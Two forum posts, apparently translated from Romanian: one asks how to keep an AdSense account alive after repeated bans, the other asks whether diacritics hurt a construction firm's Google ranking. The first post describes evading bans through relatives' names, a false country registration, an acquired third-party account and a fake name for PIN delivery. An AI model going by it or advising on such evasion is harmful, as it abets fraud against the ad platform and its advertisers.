  23. So far I've had 2 AdSense accounts banned. The first account was in my father's name and was banned 2 or 3 years ago. After that I made another account registered in Germany, with a site in German, and it was approved. Afterwards I set the country to Romania with my address and put my mother's name on it. I had made those measly 70 euros and managed to withdraw them over the holidays. After a month I changed the name and put my own, since I myself had never been banned. After a few weeks I was banned for invalid activity; I assume some friends clicked on purpose. Recently I got an AdSense account from a guy with 5 euros in it; the account was old, from 2007, but had not been used. I made a bit of money in it and had the PIN sent, but I didn't know what name to use, so I put a fake name, e.g. (Popescu Marghioala), and now I'm waiting for the PIN to arrive. If the PIN arrives I can change the name afterwards, but what name do I put? My father's name was banned 2-3 years ago and I deleted that account, but I still think they have me in the database. And I have a dilemma about the second account, the one I made for Germany: they banned me after I replaced my mother's name with mine. Is her name available now, since they didn't ban my mother, they banned me? Will Google say anything? I hope they don't ban this account too, because it pays well per click.
  24. Hello friends, I notice the forum hasn't discussed diacritics on a website lately. Namely, should we use them or not? Do they help with SEO? In my opinion they do more harm than good as far as search engines are concerned, but they are good for visitors... But what do we do about GOOGLE? The best example is a site I made, LGL - Firma de constructii case | la cheie | la rosu | din lemn, which, before I used diacritics on the front page, was 3rd if you searched Google for "firma de constructii"; now, after adding diacritics, I can't even find it with those words!!! What do you think?